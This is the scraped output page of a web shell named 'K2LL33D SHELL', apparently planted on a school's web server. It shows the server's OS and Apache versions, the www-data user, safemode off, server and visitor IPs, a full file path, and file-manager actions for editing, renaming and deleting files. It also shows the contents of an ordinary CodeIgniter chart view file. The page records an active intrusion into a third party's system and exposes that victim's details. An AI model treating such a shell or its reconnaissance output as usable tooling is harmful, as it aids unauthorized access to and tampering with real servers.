K2LL33D SHELL

 Apache/2.4.7 (Ubuntu)
 Linux sman1baleendah 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 safemode : OFF
 MySQL: ON | Perl: ON | cURL: OFF | WGet: ON
  >  / var / www / html / sman1baleendahoppppppp / views / academic /
server ip : 104.21.89.46

your ip : 172.69.58.134

H O M E


Filename/var/www/html/sman1baleendahoppppppp/views/academic/by_end_date.php
Size1.07 kb
Permissionrw-r--r--
Ownerroot : root
Create time04-May-2025 17:23
Last modified04-May-2025 17:23
Last accessed08-Jul-2025 10:40
Actionsedit | rename | delete | download (gzip)
Viewtext | code | image
<?php defined('BASEPATH') OR exit('No direct script access allowed');?>
<script type="text/javascript" src="<?=base_url('assets/plugins/Chart.js')?>"></script>
<section class="content-header">
<h1><i class="fa fa-bar-chart text-green"></i> <?=ucwords(strtolower($title));?></h1>
</section>
<section class="content">
<div class="box">
<div class="panel-body">
<canvas id="build_chart"></canvas>
</div>
</div>
</section>
<script type="text/javascript">
var ctx = $('#build_chart');
var buildChart = new Chart(ctx, {
type: 'bar',
data: {
labels: <?=$labels?>,
datasets: [{
label: '',
data: <?=$data?>,
borderWidth: 2,
backgroundColor: 'rgba(75, 192, 192, 0.2)',
borderColor: 'rgba(75, 192, 192, 1)'
}]
},
options: {
title: {
display: true,
text: '<?=$title?>'
},
responsive: true,
scales: {
yAxes: [{
ticks: {
beginAtZero:true
}
}]
}
}
});
</script>